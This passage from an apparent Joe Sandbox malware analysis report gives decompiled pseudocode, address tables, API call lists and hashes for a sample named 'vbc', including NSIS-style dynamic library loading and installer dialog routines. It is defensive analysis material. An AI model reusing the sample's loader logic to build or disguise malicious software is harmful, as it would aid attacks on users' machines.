											__edi = (_v16 << 5) + __esi;
											__eax = __eax | __ecx;
											__eflags = _v8;
											 *(__edi + 0x1018) = __eax;
											if(_v8 < 0) {
												L93:
												__edx = 0;
												__edx = 1;
												__eflags = 1;
												L94:
												__eflags = _v8 - 1;
												 *(__edi + 0x1028) = __edx;
												if(_v8 == 1) {
													__eax =  &_v12;
													__eax = E734F1B86( &_v12);
													__eax = __eax + 1;
													__eflags = __eax;
													_v8 = __eax;
												}
												__eax = _v8;
												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
												_t136 = _v16 + 0x81; // 0x81
												_t136 = _t136 << 5;
												__eax = 0;
												__eflags = 0;
												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
												 *((intOrPtr*)(__edi + 0x1030)) = 0;
												 *((intOrPtr*)(__edi + 0x102c)) = 0;
												L97:
												__eflags = __ebx;
												if(__ebx == 0) {
													goto L57;
												}
												L98:
												__eflags = _v20;
												_v40 = 1;
												if(_v20 != 0) {
													L103:
													__eflags = _v20 - 1;
													if(_v20 == 1) {
														__eax = _v16;
														__eax = _v16 << 5;
														__eflags = __eax;
														 *(__eax + __esi + 0x102c) = __ebx;
													}
													goto L105;
												}
												_v16 = _v16 << 5;
												_t144 = __esi + 0x1030; // 0x1030
												__edi = (_v16 << 5) + _t144;
												__eax =  *__edi;
												__eflags = __eax - 0xffffffff;
												if(__eax <= 0xffffffff) {
													L101:
													__eax = GlobalFree(__eax);
													L102:
													 *__edi = __ebx;
													goto L103;
												}
												__eflags = __eax - 0x19;
												if(__eax <= 0x19) {
													goto L102;
												}
												goto L101;
											}
											__eflags = __edx;
											if(__edx > 0) {
												goto L94;
											}
											goto L93;
										case 0x22:
											goto L57;
									}
								}
								_t272 = _t269 - 1;
								__eflags = _t272;
								if(_t272 == 0) {
									_v16 = _t283;
									goto L80;
								}
								__eflags = _t272 != 1;
								if(_t272 != 1) {
									goto L162;
								}
								__eflags = _t286 - 0x6e;
								if(__eflags > 0) {
									_t309 = _t286 - 0x72;
									__eflags = _t309;
									if(_t309 == 0) {
										_push(4);
										L74:
										_pop(_t274);
										L75:
										__eflags = _v8 - 1;
										if(_v8 != 1) {
											_t96 = _t332 + 0x1010;
											 *_t96 =  *(_t332 + 0x1010) &  !_t274;
											__eflags =  *_t96;
										} else {
											 *(_t332 + 0x1010) =  *(_t332 + 0x1010) | _t274;
										}
										_v8 = 1;
										goto L57;
									}
									_t312 = _t309 - 1;
									__eflags = _t312;
									if(_t312 == 0) {
										_push(0x10);
										goto L74;
									}
									__eflags = _t312 != 0;
									if(_t312 != 0) {
										goto L57;
									}
									_push(0x40);
									goto L74;
								}
								if(__eflags == 0) {
									_push(8);
									goto L74;
								}
								_t315 = _t286 - 0x21;
								__eflags = _t315;
								if(_t315 == 0) {
									_v8 =  ~_v8;
									goto L57;
								}
								_t316 = _t315 - 0x11;
								__eflags = _t316;
								if(_t316 == 0) {
									_t274 = 0x100;
									goto L75;
								}
								_t317 = _t316 - 0x31;
								__eflags = _t317;
								if(_t317 == 0) {
									_t274 = 1;
									goto L75;
								}
								__eflags = _t317 != 0;
								if(_t317 != 0) {
									goto L57;
								}
								_push(0x20);
								goto L74;
							} else {
								_v32 = _t283;
								_v36 = _t283;
								goto L20;
							}
						}
						__eflags =  *((short*)(_t321 - 2)) - 0x3a;
						if( *((short*)(_t321 - 2)) != 0x3a) {
							goto L17;
						}
						__eflags = _v32 - _t283;
						if(_v32 == _t283) {
							goto L43;
						}
						goto L17;
					}
					_t277 = _t258 - 5;
					if(_t277 == 0) {
						__eflags = _v44 - _t283;
						if(_v44 != _t283) {
							goto L43;
						} else {
							__eflags = _v36 - 3;
							_v32 = 1;
							_v8 = _t283;
							_v20 = _t283;
							_v16 = (0 | _v36 == 0x00000003) + 1;
							_v40 = _t283;
							goto L20;
						}
					}
					_t281 = _t277 - 1;
					if(_t281 == 0) {
						__eflags = _v44 - _t283;
						if(_v44 != _t283) {
							goto L43;
						} else {
							_v32 = 2;
							_v8 = _t283;
							_v20 = _t283;
							goto L20;
						}
					}
					if(_t281 != 0x16) {
						goto L43;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L20;
					}
				}
				GlobalFree(_v56);
				GlobalFree(_v24);
				GlobalFree(_v48);
				if(_t332 == _t283 ||  *(_t332 + 0x100c) != _t283) {
					L182:
					return _t332;
				} else {
					_t225 =  *_t332 - 1;
					if(_t225 == 0) {
						_t187 = _t332 + 8; // 0x8
						_t324 = _t187;
						__eflags =  *_t324 - _t283;
						if( *_t324 != _t283) {
							_t226 = GetModuleHandleW(_t324);
							__eflags = _t226 - _t283;
							 *(_t332 + 0x1008) = _t226;
							if(_t226 != _t283) {
								L171:
								_t192 = _t332 + 0x808; // 0x808
								_t325 = _t192;
								_t227 = E734F16BD( *(_t332 + 0x1008), _t325);
								__eflags = _t227 - _t283;
								 *(_t332 + 0x100c) = _t227;
								if(_t227 == _t283) {
									__eflags =  *_t325 - 0x23;
									if( *_t325 == 0x23) {
										_t195 = _t332 + 0x80a; // 0x80a
										_t231 = E734F13B1(_t195);
										__eflags = _t231 - _t283;
										if(_t231 != _t283) {
											__eflags = _t231 & 0xffff0000;
											if((_t231 & 0xffff0000) == 0) {
												 *(_t332 + 0x100c) = GetProcAddress( *(_t332 + 0x1008), _t231 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v52 - _t283;
								if(_v52 != _t283) {
									L178:
									_t325[lstrlenW(_t325)] = 0x57;
									_t229 = E734F16BD( *(_t332 + 0x1008), _t325);
									__eflags = _t229 - _t283;
									if(_t229 != _t283) {
										L166:
										 *(_t332 + 0x100c) = _t229;
										goto L182;
									}
									__eflags =  *(_t332 + 0x100c) - _t283;
									L180:
									if(__eflags != 0) {
										goto L182;
									}
									L181:
									_t206 = _t332 + 4;
									 *_t206 =  *(_t332 + 4) | 0xffffffff;
									__eflags =  *_t206;
									goto L182;
								} else {
									__eflags =  *(_t332 + 0x100c) - _t283;
									if( *(_t332 + 0x100c) != _t283) {
										goto L182;
									}
									goto L178;
								}
							}
							_t234 = LoadLibraryW(_t324); // executed
							__eflags = _t234 - _t283;
							 *(_t332 + 0x1008) = _t234;
							if(_t234 == _t283) {
								goto L181;
							}
							goto L171;
						}
						_t188 = _t332 + 0x808; // 0x808
						_t236 = E734F13B1(_t188);
						 *(_t332 + 0x100c) = _t236;
						__eflags = _t236 - _t283;
						goto L180;
					}
					_t237 = _t225 - 1;
					if(_t237 == 0) {
						_t185 = _t332 + 0x808; // 0x808
						_t238 = _t185;
						__eflags =  *_t238 - _t283;
						if( *_t238 == _t283) {
							goto L182;
						}
						_t229 = E734F13B1(_t238);
						L165:
						goto L166;
					}
					if(_t237 != 1) {
						goto L182;
					}
					_t81 = _t332 + 8; // 0x8
					_t284 = _t81;
					_t326 = E734F13B1(_t81);
					 *(_t332 + 0x1008) = _t326;
					if(_t326 == 0) {
						goto L181;
					}
					 *(_t332 + 0x104c) =  *(_t332 + 0x104c) & 0x00000000;
					 *((intOrPtr*)(_t332 + 0x1050)) = E734F12CC(_t284);
					 *(_t332 + 0x103c) =  *(_t332 + 0x103c) & 0x00000000;
					 *((intOrPtr*)(_t332 + 0x1048)) = 1;
					 *((intOrPtr*)(_t332 + 0x1038)) = 1;
					_t90 = _t332 + 0x808; // 0x808
					_t229 =  *(_t326->i + E734F13B1(_t90) * 4);
					goto L165;
				}
			}

0x734f1c07
0x734f1c0a
0x734f1c0d
0x734f1c10
0x734f1c13
0x734f1c16
0x734f1c19
0x734f1c1b
0x734f1c1e
0x734f1c21
0x734f1c26
0x734f1c29
0x734f1c31
0x734f1c39
0x734f1c3b
0x734f1c3e
0x734f1c46
0x734f1c46
0x734f1c4b
0x734f1c4e
0x00000000
0x00000000
0x734f1c5b
0x734f1c60
0x734f1c62
0x734f1cf4
0x734f1cf4
0x734f1cf4
0x734f1cf8
0x734f1cfb
0x734f1cfd
0x734f1d1f
0x734f1d21
0x734f1d24
0x734f1d2d
0x734f1d33
0x734f1d35
0x734f1d3b
0x734f1d3b
0x734f1d41
0x734f1d44
0x734f1d44
0x734f1d47
0x734f1d47
0x734f1d4d
0x734f1d4f
0x734f1d4f
0x734f1d51
0x734f1d54
0x734f1d57
0x734f1d5d
0x734f1d63
0x734f1d66
0x734f1d8a
0x734f1d8d
0x00000000
0x00000000
0x734f1d90
0x734f1d92
0x734f1da0
0x734f1da3
0x734f1da5
0x00000000
0x00000000
0x00000000
0x00000000
0x734f1da7
0x734f1da7
0x734f1da7
0x734f1dad
0x734f1daf
0x00000000
0x00000000
0x734f1db1
0x734f1db3
0x734f1db5
0x734f1db7
0x00000000
0x00000000
0x00000000
0x734f1db7
0x734f1db9
0x734f1dbb
0x734f1dbd
0x734f1dbd
0x734f1dc3
0x734f1dc9
0x734f1dcb
0x734f1ddf
0x734f1ddf
0x734f1de1
0x734f1dcd
0x734f1dd3
0x734f1dd6
0x734f1dd6
0x00000000
0x734f1d68
0x734f1d68
0x734f1d68
0x734f1d69
0x734f1d71
0x734f1d75
0x734f1d7b
0x734f1d7f
0x00000000
0x734f1d7f
0x734f1d6b
0x734f1d6b
0x734f1d6c
0x00000000
0x00000000
0x734f1d6e
0x734f1d6f
0x00000000
0x00000000
0x00000000
0x734f1d6f
0x734f1cff
0x734f1d00
0x734f1d09
0x734f1d0c
0x734f1d19
0x734f1d19
0x734f1d0e
0x734f1d0e
0x734f1de7
0x734f1dea
0x734f1dee
0x734f1e61
0x734f1e65
0x734f1c43
0x00000000
0x734f1c43
0x00000000
0x734f1e65
0x734f1cfd
0x734f1c68
0x734f1c6b
0x734f1cce
0x734f1cd1
0x734f1ce3
0x734f1ce3
0x734f1ce6
0x734f1df3
0x734f1df6
0x734f1df6
0x734f1df8
0x734f21ae
0x734f21c6
0x734f21c6
0x734f21c9
0x00000000
0x00000000
0x734f21b3
0x734f21b4
0x734f21b7
0x734f21ba
0x734f2244
0x734f224b
0x734f2251
0x734f2255
0x734f1e5c
0x734f1e5d
0x734f1e5d
0x734f1e5e
0x00000000
0x734f1e5e
0x734f21c0
0x734f21c3
0x734f21c3
0x734f21cb
0x734f21ce
0x734f2238
0x734f1e51
0x734f1e54
0x734f1e57
0x734f1e5a
0x734f1e5a
0x00000000
0x734f1e5a
0x734f21d0
0x734f21d3
0x734f21da
0x734f21da
0x734f21dd
0x734f21e1
0x734f21f5
0x734f21f5
0x734f21f8
0x734f21fc
0x00000000
0x00000000
0x734f21fe
0x734f2202
0x00000000
0x00000000
0x734f2204
0x734f220b
0x734f220b
0x734f2211
0x734f2214
0x734f2230
0x734f2216
0x734f221f
0x734f2222
0x734f2222
0x00000000
0x734f2214
0x734f21e3
0x734f21e6
0x734f21ea
0x00000000
0x00000000
0x734f21ec
0x00000000
0x734f21ec
0x734f21d5
0x734f21d8
0x00000000
0x00000000
0x00000000
0x734f21d8
0x734f1dfe
0x734f1dfe
0x734f1dff
0x734f1f49
0x734f1f49
0x734f1f50
0x734f1f53
0x00000000
0x00000000
0x734f1f60
0x00000000
0x734f214b
0x734f214e
0x734f2151
0x734f2151
0x734f2152
0x734f2153
0x734f2156
0x734f2159
0x734f215c
0x00000000
0x00000000
0x734f215e
0x734f215e
0x734f2162
0x734f217a
0x734f217d
0x734f2181
0x734f2187
0x00000000
0x734f2187
0x734f2164
0x734f2164
0x734f2167
0x00000000
0x00000000
0x734f2169
0x734f216c
0x734f216e
0x734f216f
0x734f216f
0x734f216f
0x734f2170
0x734f2173
0x734f2176
0x734f2177
0x734f2151
0x734f2152
0x734f2153
0x734f2156
0x734f2159
0x734f215c
0x00000000
0x00000000
0x00000000
0x734f215c
0x00000000
0x734f1fa7
0x00000000
0x00000000
0x734f1fb3
0x00000000
0x00000000
0x734f1f9a
0x734f1f9e
0x734f1fa2
0x00000000
0x00000000
0x734f211c
0x734f2120
0x00000000
0x00000000
0x734f2126
0x734f212f
0x734f2136
0x734f213e
0x00000000
0x00000000
0x734f2083
0x734f2083
0x00000000
0x00000000
0x734f1fbc
0x00000000
0x00000000
0x734f21a6
0x00000000
0x00000000
0x734f208b
0x734f208d
0x734f208d
0x00000000
0x00000000
0x734f2196
0x00000000
0x00000000
0x734f219a
0x00000000
0x00000000
0x734f21a2
0x00000000
0x00000000
0x734f20d3
0x734f20d5
0x734f20d5
0x00000000
0x00000000
0x734f209d
0x734f209f
0x734f209f
0x00000000
0x00000000
0x734f20af
0x734f20b1
0x734f20b1
0x00000000
0x00000000
0x734f20e1
0x734f20e3
0x734f20e3
0x00000000
0x00000000
0x734f20ba
0x734f20bc
0x734f20bc
0x00000000
0x00000000
0x734f20c1
0x00000000
0x00000000
0x734f219e
0x734f21a8
0x734f21a8
0x00000000
0x00000000
0x734f20ec
0x734f20f0
0x734f20f5
0x734f20f8
0x734f20f9
0x734f20fc
0x734f2102
0x734f2102
0x00000000
0x00000000
0x734f218e
0x00000000
0x00000000
0x734f20c5
0x734f20c7
0x734f20c7
0x00000000
0x00000000
0x734f1fc3
0x734f1fc3
0x00000000
0x00000000
0x734f20da
0x734f20dc
0x734f20dc
0x00000000
0x00000000
0x734f1f67
0x734f1f6d
0x734f1f70
0x734f1f72
0x734f1f72
0x734f1f75
0x734f1f79
0x734f1f86
0x734f1f88
0x734f1f8e
0x734f1f8e
0x734f1f8e
0x00000000
0x00000000
0x734f208e
0x734f208e
0x734f2090
0x734f2097
0x00000000
0x00000000
0x734f20d6
0x734f20d6
0x00000000
0x00000000
0x734f20a0
0x734f20a0
0x734f20a2
0x734f20a9
0x00000000
0x00000000
0x734f20b2
0x734f20b2
0x734f20b4
0x00000000
0x00000000
0x734f20e4
0x734f20e4
0x00000000
0x00000000
0x734f20bd
0x734f20bd
0x00000000
0x00000000
0x734f210a
0x734f210e
0x734f2113
0x734f2116
0x00000000
0x00000000
0x734f20c8
0x734f20c8
0x734f20cb
0x734f20cd
0x00000000
0x00000000
0x734f20dd
0x734f20dd
0x734f20e6
0x734f20e6
0x734f1fc5
0x734f1fc5
0x734f1fc8
0x734f1fcf
0x734f1fd1
0x734f1fd3
0x734f1fda
0x734f1fdd
0x734f1fe2
0x734f1fe4
0x734f1fe6
0x734f1fea
0x734f1ff0
0x734f1ff6
0x734f1ff6
0x734f1ff8
0x734f1ff8
0x734f1ff9
0x734f1ff9
0x734f1ffd
0x734f2003
0x734f2005
0x734f2009
0x734f200e
0x734f200e
0x734f2010
0x734f2010
0x734f2013
0x734f2016
0x734f201f
0x734f2025
0x734f2028
0x734f2028
0x734f202a
0x734f202d
0x734f2033
0x734f2039
0x734f2039
0x734f203b
0x00000000
0x00000000
0x734f2041
0x734f2041
0x734f2045
0x734f204c
0x734f2070
0x734f2070
0x734f2074
0x734f2076
0x734f2079
0x734f2079
0x734f207c
0x734f207c
0x00000000
0x734f2074
0x734f2051
0x734f2054
0x734f2054
0x734f205b
0x734f205d
0x734f2060
0x734f2067
0x734f2068
0x734f206e
0x734f206e
0x00000000
0x734f206e
0x734f2062
0x734f2065
0x00000000
0x00000000
0x00000000
0x734f2065
0x734f1ff2
0x734f1ff4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x734f1f60
0x734f1e05
0x734f1e05
0x734f1e06
0x734f1f46
0x00000000
0x734f1f46
0x734f1e0c
0x734f1e0d
0x00000000
0x00000000
0x734f1e13
0x734f1e16
0x734f1f0b
0x734f1f0b
0x734f1f0e
0x734f1f23
0x734f1f25
0x734f1f25
0x734f1f26
0x734f1f29
0x734f1f2c
0x734f1f38
0x734f1f38
0x734f1f38
0x734f1f2e
0x734f1f2e
0x734f1f2e
0x734f1f3e
0x00000000
0x734f1f3e
0x734f1f10
0x734f1f10
0x734f1f11
0x734f1f1f
0x00000000
0x734f1f1f
0x734f1f14
0x734f1f15
0x00000000
0x00000000
0x734f1f1b
0x00000000
0x734f1f1b
0x734f1e1c
0x734f1f07
0x00000000
0x734f1f07
0x734f1e22
0x734f1e22
0x734f1e25
0x734f1e4e
0x00000000
0x734f1e4e
0x734f1e27
0x734f1e27
0x734f1e2a
0x734f1e44
0x00000000
0x734f1e44
0x734f1e2c
0x734f1e2c
0x734f1e2f
0x734f1e3e
0x00000000
0x734f1e3e
0x734f1e32
0x734f1e33
0x00000000
0x00000000
0x734f1e35
0x00000000
0x734f1cec
0x734f1cec
0x734f1cef
0x00000000
0x734f1cef
0x734f1ce6
0x734f1cd3
0x734f1cd8
0x00000000
0x00000000
0x734f1cda
0x734f1cdd
0x00000000
0x00000000
0x00000000
0x734f1cdd
0x734f1c6d
0x734f1c70
0x734f1ca6
0x734f1ca9
0x00000000
0x734f1caf
0x734f1cb1
0x734f1cb5
0x734f1cbc
0x734f1cc3
0x734f1cc6
0x734f1cc9
0x00000000
0x734f1cc9
0x734f1ca9
0x734f1c72
0x734f1c73
0x734f1c8e
0x734f1c91
0x00000000
0x734f1c97
0x734f1c97
0x734f1c9e
0x734f1ca1
0x00000000
0x734f1ca1
0x734f1c91
0x734f1c78
0x00000000
0x734f1c7e
0x734f1c7e
0x734f1c85
0x00000000
0x734f1c85
0x734f1c78
0x734f1e74
0x734f1e79
0x734f1e7e
0x734f1e82
0x734f2355
0x734f235b
0x734f1e94
0x734f1e96
0x734f1e97
0x734f227e
0x734f227e
0x734f2281
0x734f2284
0x734f22a1
0x734f22a7
0x734f22a9
0x734f22af
0x734f22c6
0x734f22c6
0x734f22c6
0x734f22d3
0x734f22d9
0x734f22dc
0x734f22e2
0x734f22e4
0x734f22e8
0x734f22ea
0x734f22f1
0x734f22f6
0x734f22f9
0x734f22fb
0x734f2300
0x734f2312
0x734f2312
0x734f2300
0x734f22f9
0x734f22e8
0x734f2318
0x734f231b
0x734f2325
0x734f232d
0x734f233a
0x734f2340
0x734f2343
0x734f2273
0x734f2273
0x00000000
0x734f2273
0x734f2349
0x734f234f
0x734f234f
0x00000000
0x00000000
0x734f2351
0x734f2351
0x734f2351
0x734f2351
0x00000000
0x734f231d
0x734f231d
0x734f2323
0x00000000
0x00000000
0x00000000
0x734f2323
0x734f231b
0x734f22b2
0x734f22b8
0x734f22ba
0x734f22c0
0x00000000
0x00000000
0x00000000
0x734f22c0
0x734f2286
0x734f228d
0x734f2293
0x734f2299
0x00000000
0x734f2299
0x734f1e9d
0x734f1e9e
0x734f225d
0x734f225d
0x734f2263
0x734f2266
0x00000000
0x00000000
0x734f226d
0x734f2272
0x00000000
0x734f2272
0x734f1ea5
0x00000000
0x00000000
0x734f1eab
0x734f1eab
0x734f1eb4
0x734f1eb9
0x734f1ebf
0x00000000
0x00000000
0x734f1ec5
0x734f1ed2
0x734f1ed8
0x734f1ee2
0x734f1ee8
0x734f1ef0
0x734f1f00
0x00000000
0x734f1f00

APIs

Part of subcall function 734F12BB: GlobalAlloc.KERNELBASE(00000040,?,734F12DB,?,734F137F,00000019,734F11CA,-000000A0), ref: 734F12C5

GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 734F1D2D
lstrcpyW.KERNEL32(00000008,?), ref: 734F1D75
lstrcpyW.KERNEL32(00000808,?), ref: 734F1D7F
GlobalFree.KERNEL32(00000000), ref: 734F1D92
GlobalFree.KERNEL32(?), ref: 734F1E74
GlobalFree.KERNEL32(?), ref: 734F1E79
GlobalFree.KERNEL32(?), ref: 734F1E7E
GlobalFree.KERNEL32(00000000), ref: 734F2068
lstrcpyW.KERNEL32(?,?), ref: 734F2222
GetModuleHandleW.KERNEL32(00000008), ref: 734F22A1
LoadLibraryW.KERNEL32(00000008), ref: 734F22B2
GetProcAddress.KERNEL32(?,?), ref: 734F230C
lstrlenW.KERNEL32(00000808), ref: 734F2326

Memory Dump Source

Source File: 00000004.00000002.1159305311.00000000734F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 734F0000, based on PE: true

Associated: 00000004.00000002.1159300360.00000000734F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1159309786.00000000734F4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1159313695.00000000734F6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_734f0000_vbc.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: c310631a2da6e60cef2fa28dfba38ddd2b8eb5ae73e2008d5d6b1c5e5f861635
Instruction ID: eb163188c22dc03ba171614848db31c953467d1a179f3779a7a433dc90a67327
Opcode Fuzzy Hash: c310631a2da6e60cef2fa28dfba38ddd2b8eb5ae73e2008d5d6b1c5e5f861635
Instruction Fuzzy Hash: CB228775D0024BDFDB19DFA4C9807EEB7B5FB08319F1C452ED1A6E2284D7709A828B58

Uniqueness

Uniqueness Score: -1.00%

Function 00406850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406850(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x7a4f98); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x7a4f98;
			}

0x0040685b
0x00406864
0x00000000
0x00406871
0x00406867
0x00000000

APIs

FindFirstFileW.KERNELBASE(7556D4C4,007A4F98,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,00405F3A,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,7556D4C4,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,7556D4C4,C:\Users\user\AppData\Local\Temp\), ref: 0040685B
FindClose.KERNEL32(00000000), ref: 00406867

Strings

C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp, xrefs: 00406850

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp
API String ID: 2295610775-2005183556
Opcode ID: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
Instruction ID: 4aa2ce40dd0fdaaf15299f79bbf0ddad0ee07bd1ec444a92f9406ee76b8f93c8
Opcode Fuzzy Hash: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
Instruction Fuzzy Hash: 3CD012365592205FC7402779AE0CC4B7A689F563313268B36B0EAF11F0CA74CC3296ED

Uniqueness

Uniqueness Score: -1.00%

Function 00403F77 Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00403F77(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x7a1f30 = _t34;
					if(_t130 == 0x110) {
						 *0x7a8a68 = _t127;
						 *0x7a1f44 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x79ff10 = _t91;
						E00404476(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x7a7a48);
						 *0x7a7a2c = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x7a1f30 = 1;
					}
					_t124 =  *0x40a368; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x7a8a80;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E004044C2(0x40b);
						while(1) {
							_t36 =  *0x7a1f30;
							 *0x40a368 =  *0x40a368 + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a368; // 0x0
							__eflags = _t38 -  *0x7a8a84;
							if(_t38 ==  *0x7a8a84) {
								E0040140B(1);
							}
							__eflags =  *0x7a7a2c - _t136;
							if( *0x7a7a2c != _t136) {
								break;
							}
							__eflags =  *0x40a368 -  *0x7a8a84; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E00406557(_t117, _t127, _t133, 0x7b8000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E00404476(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E00404476(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E00404476(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x7a8aec - _t136;
							_v28 = _t48;
							if( *0x7a8aec != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
							E00404498(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x79ff10, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x7a8aec - _t136;
							if( *0x7a8aec == _t136) {
								_push( *0x7a1f44);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x79ff10);
							}
							E004044AB();
							E0040651A(0x7a1f48, E00403F58());
							E00406557(0x7a1f48, _t127, _t133,  &(0x7a1f48[lstrlenW(0x7a1f48)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x7a1f48); // executed
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)), _t136);
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x7a7a38); // executed
									 *0x7a0f20 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x7a8a60,  *_t133 +  *0x7a7a40 & 0x0000ffff, _t127,  *( *(_t133 + 4) * 4 + "5F@"), _t133); // executed
									__eflags = _t73 - _t136;
									 *0x7a7a38 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E00404476(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x7a7a38, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									E00401389( *((intOrPtr*)(_t133 + 0xc)), _t136);
									__eflags =  *0x7a7a2c - _t136;
									if( *0x7a7a2c != _t136) {
										goto L63;
									}
									ShowWindow( *0x7a7a38, 8); // executed
									E004044C2(0x405);
									goto L60;
								}
								__eflags =  *0x7a8aec - _t136;
								if( *0x7a8aec != _t136) {
									goto L63;
								}
								__eflags =  *0x7a8ae0 - _t136;
								if( *0x7a8ae0 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x7a7a38);
						 *0x7a8a68 = _t136;
						EndDialog(_t127,  *0x7a0718);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)), 0);
